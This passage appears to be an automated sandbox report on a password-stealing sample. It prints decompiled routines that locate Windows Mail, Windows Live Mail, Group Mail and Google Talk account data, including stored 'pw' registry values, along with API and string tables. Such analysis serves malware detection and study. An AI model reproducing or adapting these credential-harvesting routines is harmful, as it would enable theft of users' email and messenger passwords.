                                                              • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                              • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                              • API String ID: 2768085393-1693574875
                                                              • Opcode ID: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                              • Instruction ID: 6117dd664a6da5d1700893ef21bfd696e4846e6baba0a559227c27352822965f
                                                              • Opcode Fuzzy Hash: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                              • Instruction Fuzzy Hash: 95316D72504344AFD700DF55DC40D9BBBECEB88358F40493EFA84E2160E774DA188B6A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 242 411654-411670 call 411840 GetModuleHandleA 245 411691-411694 242->245 246 411672-41167d 242->246 248 4116bd-41170a __set_app_type __p__fmode __p__commode call 401a4d 245->248 246->245 247 41167f-411688 246->247 249 4116a9-4116ad 247->249 250 41168a-41168f 247->250 257 411718-411772 call 41182c _initterm __getmainargs _initterm 248->257 258 41170c-411717 __setusermatherr 248->258 249->245 253 4116af-4116b1 249->253 250->245 252 411696-41169d 250->252 252->245 255 41169f-4116a7 252->255 256 4116b7-4116ba 253->256 255->256 256->248 261 411774-41177c 257->261 262 4117ae-4117b1 257->262 258->257 263 411782-411785 261->263 264 41177e-411780 261->264 265 4117b3-4117b7 262->265 266 41178b-41178f 262->266 263->266 267 411787-411788 263->267 264->261 264->263 265->262 268 411791-411793 266->268 269 411795-4117a6 GetStartupInfoA 266->269 267->266 268->267 268->269 270 4117b9-4117bb 269->270 271 4117a8-4117ac 269->271 272 4117bc-4117d0 GetModuleHandleA call 40b9ad 270->272 271->272 275 4117d2-4117d3 exit 272->275 276 4117d9-411819 _cexit call 411879 272->276 275->276
                                                              C-Code - Quality: 82%
                                                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                              				struct HINSTANCE__* _t33;
                                                              				intOrPtr* _t35;
                                                              				intOrPtr* _t36;
                                                              				void* _t39;
                                                              				void _t41;
                                                              				intOrPtr _t48;
                                                              				signed int _t50;
                                                              				int _t52;
                                                              				intOrPtr _t55;
                                                              				signed int _t56;
                                                              				signed int _t57;
                                                              				intOrPtr _t62;
                                                              				intOrPtr _t63;
                                                              				intOrPtr* _t65;
                                                              				intOrPtr* _t69;
                                                              				int _t70;
                                                              				void* _t71;
                                                              				intOrPtr _t79;
                                                              
                                                              				_push(0x70);
                                                              				_push(0x4123e0);
                                                              				E00411840(__ebx, __edi, __esi);
                                                              				_t33 = GetModuleHandleA(0);
                                                              				if(_t33->i != 0x5a4d) {
                                                              					L4:
                                                              					 *(_t71 - 0x1c) = 0;
                                                              				} else {
                                                              					_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
                                                              					if( *_t65 != 0x4550) {
                                                              						goto L4;
                                                              					} else {
                                                              						_t56 =  *(_t65 + 0x18) & 0x0000ffff;
                                                              						if(_t56 == 0x10b) {
                                                              							__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
                                                              							if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
                                                              								goto L4;
                                                              							} else {
                                                              								_t57 = 0;
                                                              								__eflags =  *(_t65 + 0xe8);
                                                              								goto L9;
                                                              							}
                                                              						} else {
                                                              							if(_t56 == 0x20b) {
                                                              								__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
                                                              								if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
                                                              									goto L4;
                                                              								} else {
                                                              									_t57 = 0;
                                                              									__eflags =  *(_t65 + 0xf8);
                                                              									L9:
                                                              									_t9 = __eflags != 0;
                                                              									__eflags = _t9;
                                                              									 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
                                                              								}
                                                              							} else {
                                                              								goto L4;
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				 *(_t71 - 4) = 0;
                                                              				__set_app_type(2);
                                                              				 *0x417b6c =  *0x417b6c | 0xffffffff;
                                                              				 *0x417b70 =  *0x417b70 | 0xffffffff;
                                                              				_t35 = __p__fmode();
                                                              				_t62 =  *0x416b8c; // 0x0
                                                              				 *_t35 = _t62;
                                                              				_t36 = __p__commode();
                                                              				_t63 =  *0x416b88; // 0x0
                                                              				 *_t36 = _t63;
                                                              				 *0x417b68 =  *_adjust_fdiv;
                                                              				_t39 = E00401A4D();
                                                              				_t79 =  *0x416000; // 0x1
                                                              				if(_t79 == 0) {
                                                              					__setusermatherr(E00401A4D);
                                                              					_pop(_t63);
                                                              				}
                                                              				E0041182C(_t39);
                                                              				_push(0x4123b0);
                                                              				_push(0x4123ac);
                                                              				L00411826();
                                                              				_t41 =  *0x416b84; // 0x0
                                                              				 *(_t71 - 0x20) = _t41;
                                                              				 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x416b80, _t71 - 0x20);
                                                              				_push(0x4123a8);
                                                              				_push(0x412394); // executed
                                                              				L00411826(); // executed
                                                              				_t69 =  *_acmdln;
                                                              				 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                              				if( *_t69 != 0x22) {
                                                              					while(1) {
                                                              						__eflags =  *_t69 - 0x20;
                                                              						if(__eflags <= 0) {
                                                              							goto L17;
                                                              						}
                                                              						_t69 = _t69 + 1;
                                                              						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                              					}
                                                              				} else {
                                                              					do {
                                                              						_t69 = _t69 + 1;
                                                              						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                              						_t55 =  *_t69;
                                                              					} while (_t55 != 0 && _t55 != 0x22);
                                                              					if( *_t69 == 0x22) {
                                                              						L16:
                                                              						_t69 = _t69 + 1;
                                                              						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                              					}
                                                              				}
                                                              				L17:
                                                              				_t48 =  *_t69;
                                                              				if(_t48 != 0 && _t48 <= 0x20) {
                                                              					goto L16;
                                                              				}
                                                              				 *(_t71 - 0x4c) = 0;
                                                              				GetStartupInfoA(_t71 - 0x78);
                                                              				_t87 =  *(_t71 - 0x4c) & 0x00000001;
                                                              				if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
                                                              					_t50 = 0xa;
                                                              				} else {
                                                              					_t50 =  *(_t71 - 0x48) & 0x0000ffff;
                                                              				}
                                                              				_t52 = E0040B9AD(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
                                                              				_t70 = _t52;
                                                              				 *(_t71 - 0x7c) = _t70;
                                                              				if( *(_t71 - 0x1c) == 0) {
                                                              					exit(_t70); // executed
                                                              				}
                                                              				__imp___cexit();
                                                              				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
                                                              				return E00411879(_t70);
                                                              			}





















                                                              0x00411654
                                                              0x00411656
                                                              0x0041165b
                                                              0x00411669
                                                              0x00411670
                                                              0x00411691
                                                              0x00411691
                                                              0x00411672
                                                              0x00411675
                                                              0x0041167d
                                                              0x00000000
                                                              0x0041167f
                                                              0x0041167f
                                                              0x00411688
                                                              0x004116a9
                                                              0x004116ad
                                                              0x00000000
                                                              0x004116af
                                                              0x004116af
                                                              0x004116b1
                                                              0x00000000
                                                              0x004116b1
                                                              0x0041168a
                                                              0x0041168f
                                                              0x00411696
                                                              0x0041169d
                                                              0x00000000
                                                              0x0041169f
                                                              0x0041169f
                                                              0x004116a1
                                                              0x004116b7
                                                              0x004116b7
                                                              0x004116b7
                                                              0x004116ba
                                                              0x004116ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0041168f
                                                              0x00411688
                                                              0x0041167d
                                                              0x004116bd
                                                              0x004116c2
                                                              0x004116c9
                                                              0x004116d0
                                                              0x004116d7
                                                              0x004116dd
                                                              0x004116e3
                                                              0x004116e5
                                                              0x004116eb
                                                              0x004116f1
                                                              0x004116fa
                                                              0x004116ff
                                                              0x00411704
                                                              0x0041170a
                                                              0x00411711
                                                              0x00411717
                                                              0x00411717
                                                              0x00411718
                                                              0x0041171d
                                                              0x00411722
                                                              0x00411727
                                                              0x0041172c
                                                              0x00411731
                                                              0x00411750
                                                              0x00411753
                                                              0x00411758
                                                              0x0041175d
                                                              0x0041176a
                                                              0x0041176c
                                                              0x00411772
                                                              0x004117ae
                                                              0x004117ae
                                                              0x004117b1
                                                              0x00000000
                                                              0x00000000
                                                              0x004117b3
                                                              0x004117b4
                                                              0x004117b4
                                                              0x00411774
                                                              0x00411774
                                                              0x00411774
                                                              0x00411775
                                                              0x00411778
                                                              0x0041177a
                                                              0x00411785
                                                              0x00411787
                                                              0x00411787
                                                              0x00411788
                                                              0x00411788
                                                              0x00411785
                                                              0x0041178b
                                                              0x0041178b
                                                              0x0041178f
                                                              0x00000000
                                                              0x00000000
                                                              0x00411795
                                                              0x0041179c
                                                              0x004117a2
                                                              0x004117a6
                                                              0x004117bb
                                                              0x004117a8
                                                              0x004117a8
                                                              0x004117a8
                                                              0x004117c3
                                                              0x004117c8
                                                              0x004117ca
                                                              0x004117d0
                                                              0x004117d3
                                                              0x004117d3
                                                              0x004117d9
                                                              0x0041180e
                                                              0x00411819

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                              • String ID:
                                                              • API String ID: 3662548030-0
                                                              • Opcode ID: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                              • Instruction ID: d7daaed26df3896bd014a213398510a4c94beeaf1e1b2d32e797684dc565bfa8
                                                              • Opcode Fuzzy Hash: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                              • Instruction Fuzzy Hash: 60416DB0D40218DFCB209FA4D984AED7BB4AB08314F24857BE661D72A1D77D99C2CB5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              C-Code - Quality: 92%
                                                              			E00410D1B(void* __eflags, intOrPtr _a4) {
                                                              				void _v275;
                                                              				char _v276;
                                                              				char _v532;
                                                              				void _v539;
                                                              				char _v540;
                                                              				void _v795;
                                                              				char _v796;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				int _t44;
                                                              				char* _t46;
                                                              				char* _t48;
                                                              				void* _t64;
                                                              				intOrPtr _t65;
                                                              				void* _t66;
                                                              				signed int _t68;
                                                              				void* _t74;
                                                              				void* _t75;
                                                              
                                                              				_t75 = __eflags;
                                                              				_v796 = 0;
                                                              				memset( &_v795, 0, 0x104);
                                                              				_t64 = 0x1c;
                                                              				_t61 =  &_v796;
                                                              				 *((intOrPtr*)(_a4 + 4)) = 1;
                                                              				E0040EE59( &_v796, _t64); // executed
                                                              				E00406734( &_v796, "\\Microsoft\\Windows Mail");
                                                              				_t65 = _a4;
                                                              				E00410C43(_t65, _t75, _t61); // executed
                                                              				 *((intOrPtr*)(_t65 + 4)) = 2;
                                                              				_t66 = 0x1c;
                                                              				E0040EE59(_t61, _t66);
                                                              				E00406734(_t61, "\\Microsoft\\Windows Live Mail");
                                                              				E00410C43(_a4, _t75, _t61); // executed
                                                              				_v276 = 0;
                                                              				memset( &_v275, 0, 0x104);
                                                              				_v540 = 0;
                                                              				memset( &_v539, 0, 0x104);
                                                              				E0040EBC1(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
                                                              				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
                                                              				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104);
                                                              				_t44 = strlen( &_v540);
                                                              				if(_t44 > 0) {
                                                              					_t48 = _t74 + _t44 + 0x117;
                                                              					if( *_t48 == 0x5c) {
                                                              						 *_t48 = 0;
                                                              					}
                                                              				}
                                                              				_push( &_v532);
                                                              				_t46 =  &_v796;
                                                              				_push(_t46);
                                                              				L004115B2();
                                                              				_t78 = _t46;
                                                              				if(_t46 != 0) {
                                                              					_t46 = E00410C43(_a4, _t78,  &_v532); // executed
                                                              				}
                                                              				return _t46;
                                                              			}





















                                                              0x00410d1b
                                                              0x00410d37
                                                              0x00410d3c
                                                              0x00410d49
                                                              0x00410d4a
                                                              0x00410d4e
                                                              0x00410d55
                                                              0x00410d5f
                                                              0x00410d64
                                                              0x00410d6d
                                                              0x00410d72
                                                              0x00410d7b
                                                              0x00410d7c
                                                              0x00410d86
                                                              0x00410d92
                                                              0x00410da2
                                                              0x00410daa
                                                              0x00410dbd
                                                              0x00410dc5
                                                              0x00410de5
                                                              0x00410dea
                                                              0x00410dfe
                                                              0x00410e0c
                                                              0x00410e14
                                                              0x00410e16
                                                              0x00410e20
                                                              0x00410e22
                                                              0x00410e22
                                                              0x00410e20
                                                              0x00410e2c
                                                              0x00410e2d
                                                              0x00410e31
                                                              0x00410e32
                                                              0x00410e37
                                                              0x00410e3b
                                                              0x00410e48
                                                              0x00410e48
                                                              0x00410e53

                                                              APIs
                                                              • memset.MSVCRT ref: 00410D3C
                                                                • Part of subcall function 00406734: strlen.MSVCRT ref: 00406736
                                                                • Part of subcall function 00406734: strlen.MSVCRT ref: 00406741
                                                                • Part of subcall function 00406734: strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                • Part of subcall function 0040EE59: memset.MSVCRT ref: 0040EEAE
                                                                • Part of subcall function 0040EE59: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                • Part of subcall function 0040EE59: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                              • memset.MSVCRT ref: 00410DAA
                                                              • memset.MSVCRT ref: 00410DC5
                                                                • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 00410DFE
                                                              • strlen.MSVCRT ref: 00410E0C
                                                              • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 00410E32
                                                              Strings
                                                              • \Microsoft\Windows Mail, xrefs: 00410D5A
                                                              • Store Root, xrefs: 00410DD6
                                                              • \Microsoft\Windows Live Mail, xrefs: 00410D81
                                                              • Software\Microsoft\Windows Live Mail, xrefs: 00410DDB
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                              • API String ID: 4071991895-2578778931
                                                              • Opcode ID: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                              • Instruction ID: 656a87abbde68b626b6b67706479efffa51c3f1aad4b8967eb2d69b922da332e
                                                              • Opcode Fuzzy Hash: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                              • Instruction Fuzzy Hash: 3D318DB2548348ABD324E799DC46FCB77DC9BC4318F04482FF649D7182E678D68487AA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 301 404837-404860 LoadLibraryA 302 404862-404870 GetProcAddress 301->302 303 40488a-404892 #17 301->303 305 404872-404876 302->305 306 40487b-404884 FreeLibrary 302->306 304 404893-404898 303->304 307 4048b1-4048b5 304->307 308 40489a-4048b0 MessageBoxA 304->308 310 404879 305->310 306->303 309 404886-404888 306->309 309->304 310->306
                                                              C-Code - Quality: 58%
                                                              			E00404837(void* __ecx) {
                                                              				intOrPtr _v8;
                                                              				char _v12;
                                                              				struct HWND__* _t6;
                                                              				_Unknown_base(*)()* _t11;
                                                              				struct HWND__* _t13;
                                                              				struct HWND__* _t15;
                                                              				void* _t20;
                                                              				struct HINSTANCE__* _t23;
                                                              
                                                              				_v12 = 8;
                                                              				_v8 = 0xff;
                                                              				_t15 = 0;
                                                              				_t20 = 0;
                                                              				_t23 = LoadLibraryA("comctl32.dll");
                                                              				if(_t23 == 0) {
                                                              					L5:
                                                              					__imp__#17();
                                                              					_t6 = 1;
                                                              					L6:
                                                              					if(_t6 != 0) {
                                                              						return 1;
                                                              					} else {
                                                              						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
                                                              						return 0;
                                                              					}
                                                              				}
                                                              				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                              				if(_t11 != 0) {
                                                              					_t20 = 1; // executed
                                                              					_t13 =  *_t11( &_v12); // executed
                                                              					_t15 = _t13;
                                                              				}
                                                              				FreeLibrary(_t23);
                                                              				if(_t20 == 0) {
                                                              					goto L5;
                                                              				} else {
                                                              					_t6 = _t15;
                                                              					goto L6;
                                                              				}
                                                              			}











                                                              0x00404844
                                                              0x0040484b
                                                              0x00404852
                                                              0x00404854
                                                              0x0040485c
                                                              0x00404860
                                                              0x0040488a
                                                              0x0040488a
                                                              0x00404892
                                                              0x00404893
                                                              0x00404898
                                                              0x004048b5
                                                              0x0040489a
                                                              0x004048a7
                                                              0x004048b0
                                                              0x004048b0
                                                              0x00404898
                                                              0x00404868
                                                              0x00404870
                                                              0x00404876
                                                              0x00404877
                                                              0x00404879
                                                              0x00404879
                                                              0x0040487c
                                                              0x00404884
                                                              0x00000000
                                                              0x00404886
                                                              0x00404886
                                                              0x00000000
                                                              0x00404886

                                                              APIs
                                                              • LoadLibraryA.KERNEL32(comctl32.dll,74B04DE0,?,00000000,?,?,?,0040B9C9,74B04DE0), ref: 00404856
                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,74B04DE0), ref: 0040487C
                                                              • #17.COMCTL32(?,00000000,?,?,?,0040B9C9,74B04DE0), ref: 0040488A
                                                              • MessageBoxA.USER32 ref: 004048A7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                              • API String ID: 2780580303-317687271
                                                              • Opcode ID: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                              • Instruction ID: 848b23aeb75660b77c3c697252adc3032e5e70f3caa3a854567a53d2e3e71345
                                                              • Opcode Fuzzy Hash: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                              • Instruction Fuzzy Hash: 3E0126723102017FD7156BA08D48BAF7AACEB84749F008139F602E21C0EBF8C912D6AC
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 311 4037b1-403803 memset * 2 call 410f79 314 4038c9-4038cc 311->314 315 403809-403869 call 4021d8 call 4060d0 * 2 strchr 311->315 322 40386b-40387c strcpy 315->322 323 40387e-403889 strlen 315->323 324 4038a6-4038c4 strcpy call 402407 322->324 323->324 325 40388b-4038a3 sprintf 323->325 324->314 325->324
                                                              C-Code - Quality: 76%
                                                              			E004037B1(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
                                                              				char _v276;
                                                              				char _v404;
                                                              				intOrPtr _v408;
                                                              				char _v792;
                                                              				intOrPtr _v796;
                                                              				char _v924;
                                                              				char _v936;
                                                              				void _v1959;
                                                              				char _v1960;
                                                              				void _v2983;
                                                              				char _v2984;
                                                              				void* __ebx;
                                                              				void* __esi;
                                                              				void* _t28;
                                                              				void* _t50;
                                                              				void* _t51;
                                                              				char* _t59;
                                                              				char* _t63;
                                                              				void* _t70;
                                                              
                                                              				_t70 = __fp0;
                                                              				_t51 = __ecx;
                                                              				_v1960 = 0;
                                                              				memset( &_v1959, 0, 0x3ff);
                                                              				_v2984 = 0;
                                                              				memset( &_v2983, 0, 0x3ff);
                                                              				_t28 = E00410F79(_t51,  &_v2984,  &_v1960); // executed
                                                              				if(_t28 == 0) {
                                                              					return _t28;
                                                              				}
                                                              				E004021D8( &_v936);
                                                              				_push( &_v1960);
                                                              				_t50 = 0x7f;
                                                              				E004060D0(_t50,  &_v276);
                                                              				_t59 =  &_v404;
                                                              				E004060D0(_t50, _t59,  &_v2984);
                                                              				_v796 = 9;
                                                              				_v408 = 3;
                                                              				_t63 = strchr(_t59, 0x40);
                                                              				_push( &_v404);
                                                              				if(_t63 == 0) {
                                                              					if(strlen() + 0xa < 0) {
                                                              						sprintf( &_v792, "%s@yahoo.com",  &_v404);
                                                              					}
                                                              				} else {
                                                              					strcpy( &_v792, ??);
                                                              					 *_t63 = 0;
                                                              				}
                                                              				strcpy( &_v924,  &_v404);
                                                              				return E00402407( &_v936, _t70, _a4);
                                                              			}






















                                                              0x004037b1
                                                              0x004037b1
                                                              0x004037cc
                                                              0x004037d2
                                                              0x004037e0
                                                              0x004037e6
                                                              0x004037fc
                                                              0x00403803
                                                              0x004038cc
                                                              0x004038cc
                                                              0x00403810
                                                              0x0040381b
                                                              0x0040381e
                                                              0x00403825
                                                              0x00403831
                                                              0x00403837
                                                              0x00403841
                                                              0x0040384b
                                                              0x0040385d
                                                              0x00403868
                                                              0x00403869
                                                              0x00403889
                                                              0x0040389e
                                                              0x004038a3
                                                              0x0040386b
                                                              0x00403872
                                                              0x00403879
                                                              0x00403879
                                                              0x004038b4
                                                              0x00000000

                                                              APIs
                                                              • memset.MSVCRT ref: 004037D2
                                                              • memset.MSVCRT ref: 004037E6
                                                                • Part of subcall function 00410F79: memset.MSVCRT ref: 00410F9B
                                                                • Part of subcall function 00410F79: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                                • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                              • strchr.MSVCRT ref: 00403855
                                                              • strcpy.MSVCRT(?,?,?,?,?), ref: 00403872
                                                              • strlen.MSVCRT ref: 0040387E
                                                              • sprintf.MSVCRT ref: 0040389E
                                                              • strcpy.MSVCRT(?,?,?,?,?), ref: 004038B4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                                                              • String ID: %s@yahoo.com
                                                              • API String ID: 1649821605-3288273942
                                                              • Opcode ID: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                              • Instruction ID: 59c64947ec9ad5e5fa7ad27033647646f0aae9e06f6053b7dc62ef58ab254070
                                                              • Opcode Fuzzy Hash: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                              • Instruction Fuzzy Hash: 592184B3D0412C6EDB21EB55DD41FDA77AC9F85308F0404EBB64DE6041E6B8AB848BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 327 4034cb-40352b memset * 2 call 40ebc1 330 403567-403569 327->330 331 40352d-403566 strcpy call 405f1f strcat call 4033d7 327->331 331->330
                                                              C-Code - Quality: 100%
                                                              			E004034CB(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
                                                              				void _v267;
                                                              				char _v268;
                                                              				void _v531;
                                                              				char _v532;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t15;
                                                              				void* _t23;
                                                              				char* _t28;
                                                              
                                                              				_t23 = __ecx;
                                                              				_v532 = 0;
                                                              				memset( &_v531, 0, 0x104);
                                                              				_v268 = 0;
                                                              				memset( &_v267, 0, 0x104);
                                                              				_t15 = E0040EBC1(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
                                                              				if(_t15 != 0) {
                                                              					strcpy( &_v268,  &_v532);
                                                              					_t28 =  &_v268;
                                                              					E00405F1F(_t28);
                                                              					strcat(_t28, "fb.dat");
                                                              					return E004033D7(_t28, __fp0, _a4);
                                                              				}
                                                              				return _t15;
                                                              			}












                                                              0x004034cb
                                                              0x004034e4
                                                              0x004034eb
                                                              0x004034fa
                                                              0x00403501
                                                              0x00403521
                                                              0x0040352b
                                                              0x0040353c
                                                              0x00403541
                                                              0x00403547
                                                              0x00403554
                                                              0x00000000
                                                              0x00403566
                                                              0x00403569

                                                              APIs
                                                              • memset.MSVCRT ref: 004034EB
                                                              • memset.MSVCRT ref: 00403501
                                                                • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                              • strcpy.MSVCRT(00000000,00000000), ref: 0040353C
                                                                • Part of subcall function 00405F1F: strlen.MSVCRT ref: 00405F20
                                                                • Part of subcall function 00405F1F: strcat.MSVCRT(00000000,00413044,004062BF,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 00405F37
                                                              • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 00403554
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memsetstrcat$Closestrcpystrlen
                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                              • API String ID: 1387626053-966475738
                                                              • Opcode ID: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                              • Instruction ID: 7ff2b4ee0b8a45595852750e2855a272ac8b2b1e575441dca18af6517dfb7442
                                                              • Opcode Fuzzy Hash: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                              • Instruction Fuzzy Hash: 2E01FC72D8012C75D720E6669C46FDA766C8F64745F0004A6BA4AF20C2DAFCABD48B69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              C-Code - Quality: 96%
                                                              			E0040754D(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
                                                              				void* _v0;
                                                              				char _v4;
                                                              				long _t29;
                                                              				void* _t33;
                                                              				void* _t36;
                                                              				signed int _t54;
                                                              				void* _t56;
                                                              				void* _t57;
                                                              				void* _t58;
                                                              
                                                              				_t50 = __ecx;
                                                              				E004118A0(0x1110, __ecx);
                                                              				E0040724C(_a4); // executed
                                                              				_t29 = E0040EB3F(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
                                                              				_t56 = (_t54 & 0xfffffff8) + 0xc;
                                                              				if(_t29 == 0) {
                                                              					_a4 = 0;
                                                              					_a12 = 0;
                                                              					memset( &_a13, 0, 0xff);
                                                              					_t57 = _t56 + 0xc;
                                                              					_t33 = E0040EC05(_v0, 0,  &_a12);
                                                              					while(1) {
                                                              						_t58 = _t57 + 0xc;
                                                              						if(_t33 != 0) {
                                                              							break;
                                                              						}
                                                              						_t36 = E0040EB3F(_v0,  &_a12,  &_a8);
                                                              						_t57 = _t58 + 0xc;
                                                              						if(_t36 == 0) {
                                                              							_a268 = 0;
                                                              							memset( &_a269, 0, 0xfff);
                                                              							E0040EB80(0xfff, _t50, _a8, "pw",  &_a268);
                                                              							_t57 = _t57 + 0x18;
                                                              							E00407406( &_a268, _a4,  &_a12);
                                                              							RegCloseKey(_v0);
                                                              						}
                                                              						_a4 = _a4 + 1;
                                                              						_t33 = E0040EC05(_v0, _a4,  &_a12);
                                                              					}
                                                              					_t29 = RegCloseKey(_v0);
                                                              				}
                                                              				return _t29;
                                                              			}












                                                              0x0040754d
                                                              0x00407558
                                                              0x00407562
                                                              0x00407576
                                                              0x0040757b
                                                              0x00407580
                                                              0x00407593
                                                              0x00407597
                                                              0x0040759b
                                                              0x004075a0
                                                              0x004075ad
                                                              0x00407642
